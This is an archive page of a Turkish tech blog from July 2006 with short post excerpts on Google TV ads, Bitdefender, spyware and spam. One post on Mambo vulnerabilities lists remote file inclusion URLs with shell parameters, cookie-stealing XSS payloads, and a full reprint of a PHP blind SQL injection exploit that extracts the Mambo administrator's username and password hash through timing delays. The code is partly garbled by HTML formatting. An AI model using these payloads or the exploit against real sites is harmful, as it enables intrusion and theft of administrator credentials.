Google ‘de TV Dönemi başlıyor..!

Tarih: 20 Temmuz 2006 by TEAkolik Kategoriler: Güncel, Genel, İnternet | 9 Yorum

Özet: Google firmasının yaptığı açıklamaya göre artık Google reklamları TV lerden izlenebilecek.. ADWORDS kullanan bazı kullanıcılar site trafiklerinin etkilenmesi ve Banwith zayıflıklarındann dolayı Google den TV üzerinden reklam yapmaları istenilebilecek. İsteyen kullanıcılar Google ye verdikleri reklam ile TV de görüntülenecek..! Hizmet ilk başta deneme olarak Amerika, Kanada ve Japonya’da gösterilecek sanıyorum Google bunu tüm dünyadaki televizyonlara birkaç ay içerisinde yaygınlaştırmış olur. Bana sorarsanız harika bir hizmet zaten google gibi bir yere reklam veriyorsunuz ve Google sayesinde birçok dünya ülkesinde TV … →

MAMBO Güvenlik Açıkları ..!

Tarih: 14 Temmuz 2006 by TEAkolik Kategoriler: İnternet | 1 Yorum

“http://[site]/[path]/modules/mod_cbsms_messages.php?mosConfig_absolute_path=[SHELL">
"#0000ff">http://[site]/[path]/modules/mod_cbsms_messages.php?mosConfig_absolute_ path=[SHELL"#0000ff">]
“http://[site]/[path]/components/com_forum/download.php?phpbb_root_path=[SHELL">
"#0000ff">http://[site]/[path]/components/com_forum/download.php?phpbb_root_path= [SHELL]
“http://[site]/[path]/administrator/popups/index3pop.php?mosConfig_sitename=
>”#0000ff”>http://[site]/[path]/administrator/popups/index3pop.php?mosConfig_sitename=
“http://[site]/” target=”_blank”>”http://[site]/path]/mambots/editors/mostlyce/jscripts/tiny_mce
/popupImage.php?img_title=>”#0000ff”>
http://[site]/path]/mambots/editors/mostlyce/jscripts/tiny_mce/popupImage.php? img_title=
“http://[site]/” target=”_blank”>”http://[site]/[path]/mambots/editors/mostlyce/jscripts/
tiny_mce/plugins/caption/color***ker.php?cur_colour=–%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript
%3Ealert(document.cookie”>”#0000ff”>http://[site]/[path]/mambots/editors/mostlyce
/jscripts/tiny_mce/plugins/caption/ color***ker.php?cur_colour=–%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3C
script%3Ealert(document.cookie )%3C/script%3E
“http://[site]/” target=”_blank”>”http://[site]/[path]/mambots/editors/mostlyce/jscripts/
tiny_mce/plugins/caption/color***ker.php?func=–%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%
3Ealert(document.cookie”>”#0000ff”>http://[site]/[path]/mambots/editors/
mostlyce/jscripts/tiny_mce/plugins/caption/ color***ker.php?func=–%3E%3C/script%3E%3C/head%3E%3Cbody%3E%3Cscript%3
Ealert(document.cookie )%3C/script%3E
“http://[site]/” target=”_blank”>”http://[site]/[path]/mambots/editors/mostlyce/
jscripts/tiny_mce/plugins/caption/color***ker.php?block=–%3E%3C/script%3E%3C/head%3E%3Cbody
%3E%3Cscript%3Ealert(document.cookie”>”#0000ff”>http://[site]/[path]
/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/caption/ color***ker.php?block=–%3E%3C/script%3E%3C/head
%3E%3Cbody%3E%3Cscript%3 Ealert(document.cookie )%3C/script%3E
“http://[site]/” target=”_blank”>”http://[site]/[path]/mambots/editors/mostlyce
/jscripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?image_src=http://location/evilscript.js”>
“#0000ff”>http://[site]/[path]/mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager /ImageManager
/preview.php?image_src=http://location/evilscript.js
“http://[site]/” target=”_blank”>”http://[site]/[path]/mambots/editors/mostlyce/j
scripts/tiny_mce/plugins/imgmanager/ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%
3Ealert(document.cookie)%3C/script%3E”>”#0000ff”>http://[site]/[path]/
mambots/editors/mostlyce/jscripts/tiny_mce/plugins/imgmanager /ImageManager/preview.php?img_title=%3C/title%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

SQL INJECTION : ÇOK TEHLİKELİ BİR AÇIK ADMİN ŞİFRELERİNİZİ ANINDA ALABİLİRLER:

#!/usr/bin/php -q -d short_open_tag=on < ? echo "Mambo < = 4.6rc1 'Weblinks' blind SQL injection / admin credentialsrn"; echo "disclosure exploit (benchmark() vesion)rn"; echo "by rgod rgod (at) autistici (dot) org [email concealed]rn"; echo "site: http://retrogod.altervista.orgrn"; echo "this is called the Sun-Tzu 'trascendental guru meditation' tecniquernrn"; if ($argc< 5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONSrn"; echo "host: target server (ip/hostname)rn"; echo "path: path to Mamborn"; echo "user/pass: you need an accountrn"; echo "Options:rn"; echo " -T[prefix] specify a table prefix different from 'mos_'rn"; echo " -p[port]: specify a port other than 80rn"; echo " -P[ip" src="http://www.susturucu.org/forum/images/smilies/tongue.gif"

border="0" alt="" title="Stick Out Tongue" width="16" height="16" />ort]: specify a proxyrn”; echo “Example:rn”;
echo “php “.$argv[0].” localhost /mambo/ username passwordrn”; die; } /* explaination:
sql injection in “title” argument when you submit a web link, poc: start mysql daemon with log option…
>mysqld –log=mambo.txt now login, go to “Submit Weblink” feature, in “Name: ” field type:
99999′ UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1, benchmark( 200000 000,CHAR(0)),0) FROM mos_users WHERE
usertype=’Super Administrator’/* in mambo.txt we have: 13 Query SELECT id FROM mos_weblinks
WHERE title=’99999′ UNION SELECT IF ((ASCII(SUBSTRING(password,1,1))=0) & 1,
benchark(50000000,CHAR(0)),0) FROM mos_users WHERE usertype=’Super
Administrator’/*’AND catid=’2′injection is blind but, as you can see, we can you use time delays through
Mysqlbenchmark() function to ask questions about tables this works regardless of magic_quotes_gpc settings
*/ error_reporting(0); ini_set(“max_execution_time”,0); ini_set(“default_socket_timeout”,5);
function quick_dump($string) { $result=”;$exa=”;$cont=0; for ($i=0; $i< =strlen($string)-1; $i++)
{ if ((ord($string[$i]) < = 32 ) | (ord($string[$i]) > 126 )) {$result.=” .”;} else {$result.=” “.$string[$i];}
if (strlen(dechex(ord($string[$i])))==2) {$exa.=” “.dechex(ord($string[$i]));} else {$exa.=” 0″.dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.=”rn”; $exa.=”rn”;} } return $exa.”rn”.$result; }
$proxy_regex = ‘(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b) ‘; function sendpacketii($packet)
{ global $proxy, $host, $port, $html, $proxy_regex; if ($proxy==”)
{ $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo ‘No response from ‘.$host.’:’.$port; die; } }
else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo ‘Not a valid proxy…’;die; } $parts=explode(‘:’,$proxy);
echo “Connecting to “.$parts[0].”:”.$parts[1].” proxy…rn”; $ock=fsockopen($parts[0],$parts[1]); if (!$ock)
{ echo ‘No response from proxy…’;die; } } fputs($ock,$packet); if ($proxy==”) { $html=”; while (!feof($ock))
{ $html.=fgets($ock); } } else { $html=”; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml)))
{ $html.=fread($ock,1); } } fclose($ock); #debug #echo “rn”.$html; } function is_hash($hash)
{ if (ereg(“^[a-f0-9]{32}”,trim($hash))) {return true;} else {return false;} } $host=$argv[1];
$path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $port=80; $prefix=”mos_”; $proxy=”";
for ($i=5; $i< =$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p")
{ $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); }
if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } } if (($path[0]<>‘/’) or ($path[strlen($path)-1]<>‘/’))
{echo ‘Error… check the path!’; die;} if ($proxy==”) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}
$data =”username=”.$user; $data.=”&passwd=”.$pass; $data.=”&remember=yes”; $data.=”&option=login”;
$data.=”&Submit=login”; $data.=”&op2=login”; $data.=”âŒ©=english”; $data.=”&return=”.urlencode(“http://”.$host.$path);
$data.=”&message=0″; $packet =”POST “.$p.” HTTP/1.0rn”; $packet.=”Host: “.$host.”rn”; $packet.=”Accept: text/plainrn”;
$packet.=”Connection: Closern”; $packet.=”Content-Type: application/x-www-form-urlencodedrn”;
$packet.=”Content-Length: “.strlen($data).”rnrn”; $packet.=$data; sendpacketii($packet);
$temp=explode(“Set-Cookie: “,$html); $cookie=”"; for ($i=1; $i< =count($temp)-1; $i++)
{ $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } if ((strstr($cookie,"=+;"))
| $cookie=="") {die("Unable to login...");} else { echo "Done...rncookie -> “.$cookie.”rn”; }
$j=1;$admin=”"; while (!strstr($admin,chr(0))) { for ($i=0; $i< =255; $i++) { $starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(username,".$j.",1))=".$i.") & 1, benchmark(200000000,CHAR(0)),0) FROM
".$prefix."users WHERE usertype='Super Administrator'/*"; echo "rn".$sql."rn"; $sql=urlencode($sql); $data ="title=".$sql;
$data.="&catid=2"; $data.="&url=http://www.google.com"; $data.="&description="; $data.="&id=0";
$data.="&option=com_weblinks"; $data.="&task=save"; $data.="&ordering=0"; $data.="&approved=0";
$data.="&Returnid=0"; $packet ="POST ".$p."index.php HTTP/1.0rn"; $packet.="User-Agent: Googlebot/2.1rn";
$packet.="Host: ".$host."rn"; $packet.="Accept: text/plainrn"; $packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn"; $packet.="Cookie: ".$cookie."rn";
$packet.="Content-Length: ".strlen($data)."rnrn"; $packet.=$data; //debug //echo quick_dump($packet)."rn";
sendpacketii($packet); $endtime=time(); echo "endtime -> “.$endtime.”rn”; $difftime=$endtime – $starttime;
echo “difftime -> “.$difftime.”rn”; if ($difftime > 7) {$admin.=chr($i);echo “admin -> “.$admin.”[???]rn”;sleep(2); break;}
//more than seven seconds? we succeed… if ($i==255) {die(“Exploit failed…”);} } $j++; } $md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers $md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s)); $j=1;$password=”"; while (!strstr($password,chr(0))) { for ($i=0; $i< =255; $i++)
{ if (in_array($i,$md5s)) { $starttime=time();
$sql="99999' UNION SELECT IF ((ASCII(SUBSTRING(password,".$j.",1))=".$i.") & 1,
benchmark (200000000,CHAR(0)),0) FROM ".$prefix."users WHERE usertype='Super Administrator'/*";
echo "rn".$sql."rn"; $sql=urlencode($sql); $data ="title=".$sql; $data.="&catid=2";
$data.="&url=http://www.google.com"; $data.="&description="; $data.="&id=0";
$data.="&option=com_weblinks"; $data.="&task=save"; $data.="&ordering=0";
$data.="&approved=0"; $data.="&Returnid=0"; $packet ="POST ".$p."index.php HTTP/1.0rn";
$packet.="User-Agent: Googlebot/2.1rn"; $packet.="Host: ".$host."rn";
$packet.="Accept: text/plainrn"; $packet.="Connection: Closern";
$packet.="Content-Type: application/x-www-form-urlencodedrn";
$packet.="Cookie: ".$cookie."rn"; $packet.="Content-Length: ".strlen($data)."rnrn";
$packet.=$data; //debug //echo quick_dump($packet)."rn"; sendpacketii($packet);
$endtime=time(); echo "endtime -> “.$endtime.”rn”; $difftime=$endtime – $starttime;
echo “difftime -> “.$difftime.”rn”; if ($difftime > 7) {$password.=chr($i);echo
“password -> “.$password.”[???]rn”;sleep (2);break;} } if ($i==255) {die(“Exploit failed…”);} }
$j++; } //if you are here… echo “Exploit succeeded…rn”;
echo “——————————————————————–r n”; echo “admin ->
“.$admin.”rn”; echo “password (md5) -> “.$password.”rn”; echo “——————————————————————–r n”; ?>

→

Bitdefender Professional 10 Beta 2

Tarih: 14 Temmuz 2006 by TEAkolik Kategoriler: Güvenlik, Yazılım | Yorum Gönder...

Bitdefender Pro 10 Beta sürümünü kullanımıza açtı .. Yeni sürüm de kolay kullanımı yine dikkatimizi çekiyor şimdilik deneme olarak yayınlanmasına rağmen bir çok kişi sistemine yükledi ve testlerini yapmakta tabiki bizde indirdik ve test ediyoruz. Bitdefender Firmasının internet safasında yer alan Free versiyonları ve diğer alt versiyonlarıda bulabilirsiniz. Özelliklede Online Scan bölümünden bilgisayarınızı internet üzerinden tarama taparak temizleyebilme imkanı sunuyor ve üstelik ücretsiz..! Free bölümünde aşağıda da gördüğünüz gibi Linux versiyonu mevcut …

İnternet giriş sayfam kitlendi ne yapacağım ?

Tarih: 13 Temmuz 2006 by TEAkolik Kategoriler: Microsoft, Yazılım, İnternet | 74 Yorum

Merhabalar birçoğunuzun başına gelmiştir sisteminize trojan bulaştığında bazı türevleri başlangıç sayfanızı kilitler ve değiştirmenize izin vermez şimdi sisteminizden bu kiliti açmayı göstereceğim bu arada bu bölümde lütfen yanlış birşey yapmayın sisteminizi bozabilirsiniz. Karışmam …! :p BAŞLAT tıklıyoruz. ÇALIŞTIR a geliyoruz. REGEDIT yazıp entere basıyoruz.. Karşımıza registry sistem editörü açılacak bu editörde sol traftaki değerler arasından HKEY_CURRENT_USER değerine girelim sonra altında açılacak olan SOFTWARE sonra yine altında açılacak olan Policies sonra yine altında açılacak olan

CASUS YAZILIMLAR ve KORUNMA YÖNTEMLERİ ..!

Tarih: 12 Temmuz 2006 by TEAkolik Kategoriler: Yazılım | 4 Yorum

Özet: Merhabalar bu gün sizlerle paylaşmak istediğim Casus yazılımlar ve bunlara karşı korunma yolları peki casus yazılımlar nedir diye soracak olursanız ben Casus yazılımlar adı altında trojanlardan tutunda search asistanlar a kadar herşeyi bu başlıkta topladım nedir ne yapar sisteme etkileri temizleme korunma karşı koyma temizleme hakkında sizlerle bilgimi paylaşacağım özelliklede hızla yükselen bu yazılımlar sisteminize bir bulaşmaya gelsin insanın canını gerçekten de sıkıyor. Trojan : MANASI : Truva Atı ÖZELLİKLERİ : İnternet üzerinde paylaşıma dosya yada klasör açar. Yazılımının … →

Google Analytics Nedir ? Yenir mi ? Tatlı mı ? Tuzlu mu ?

Tarih: 09 Temmuz 2006 by TEAkolik Kategoriler: Yazılım, İnternet | 7 Yorum

Özet: Internetin en büyük arama motoru olan Google yeni bir hizmeti ile karşımızda ANALYTICS .. Peki nedir bu Analytics diye sorarsanız hemen başlayalım … Google Analytics Web sayfanızdaki tüm istatislikleri tutan bir sistemdir. Bu sisteme önce üye olmanız gerekiyor. Üye olabilmek içinde davetiye gerekli önceden bir ara ücretsiz olarak hizmete sunuldu şimdi ise bir süre önce yeni üyeliklere kapatıldı tabiki nedeni aşırı ilgi bu ilgi nedeniyle sadece davetiye alarak üye olabiliyorsunuz. Hemen söyleyeyim elimde 1 adet davet var isteyen ilk … →

TURKISH EXORCIST SEYTAN (1974)

Tarih: 04 Temmuz 2006 by TEAkolik Kategoriler: Diğer, İnternet | Yorum Gönder...

Özet: TURKISH EXORCIST SEYTAN (1974) Bu gün kardeşim bana bir video izletti sizinle paylaşmak istedim süper bir film Türk’lerin yani bizlerin çevirdiği ilk KORKU FİLİMİ TURKISH EXORCIST SEYTAN (1974) 74 yılındaki teknolojik gelişmeleri göze aldığımızda gerçektende çok güzel yapmışlar. Özelliklede ŞEYTAN İÇİNE GİRMİŞ OLAN KIZ ‘ın YATAĞI OYNATMA SAHNESİ ile BOYNUNU TERSİNE ÇEVİRMESİ haa birde en tatlı bölüm diyebileceğim diyalog… Sen kimsin ? ŞEYTANNNNNNN Peki Gül Nerde ? İÇİMDEEEEEEEEE Gül’ ü göster bana OLMAZZZZZZZ Gül ‘ün nerede olduğunu Sen … →

Mp4 nedir Mp3 den farkları ve Mp5 ler

Tarih: 01 Temmuz 2006 by TEAkolik Kategoriler: Yazılım | 20 Yorum

Özet: Merhabalar bu gece istatisliklerimi kontrol ederken en çok aranan kelimeler arasında mp4 ve mp5 leri yakaladım hemen sizlere mp4 nedir mp5 ne alaka anlatayım birde benim sayfama böyle şeyler olmaz deyip geçeyim :p Mp3 leri hepiniz bilirsiniz iyi bir sıkıştırma yöntemi ile kaliteli müzik dinleyyebiliyorsunuz. Mp4 ler ise örnek verirsek 10 mb lık bir mp3 ü mp4 e çevirdiğinizde hemen hemen yarıyarıya boyutunu düşürmüş olursunuz yani 5 mb felan olur tabi aynı zamanda kalite de düşer özelliklede 128kb … →

Spamcılardan yeni bir yöntem daha ..!

Tarih: 01 Temmuz 2006 by TEAkolik Kategoriler: Güvenlik, İnternet | Yorum Gönder...

Özet: Hemen hemen hepiniz spamcılardan nefret etmissinizdir. Spamciler ne kadar spam atsada bir süre sonunda karşısına birileri çıkıp dur demek istiyor. Özel spam filitlelerinden tutunda internet securty programlarının Spam bölümü eklenmesine kadar bir çok önlem alındı spam olarak raporlamalar da baya iyi gidiyordu ki spamcılar yeni bir yöntem keşfettii…. Bu yöntem gerçektende akıllıca ve çok mantıklı artık spamciler text olarak mesaj göndermek yerine resim olarak spam atıyorlar hemen sizlere bir örnek vereyim .. Bir spamci genelde reklamlarını mailllerle text dökümanı … →

Bitdefender Antivirüs Program Testi

Tarih: 01 Temmuz 2006 by TEAkolik Kategoriler: Yazılım | 2 Yorum

Özet: Merhabalar bu gün canım fena sıkıldı W32 Parite virüsü yüzünden ..! Elimde PII 400 bir notebook var 128 Ram ile idare ediyorum. Tabiki XP kurulu nasıl kurdun diye soracak olursanız benim işim bu zaten .. Kasıla kasıla kullandığım bu notebook a birde virüs programı kurarsam kesinlikle sistem kaldırmaz diye düşünüyordum ve birçok virüs programı kurarak test etmeye başladım .. İşte size Bitdefender 8…! BitDefender 8 Standart ve Pro Plus çeşitleri var size tavsiyem Pro Plus kullanabilirsiniz. Benimki gibi 128 … →

» TEAkolik — Page 225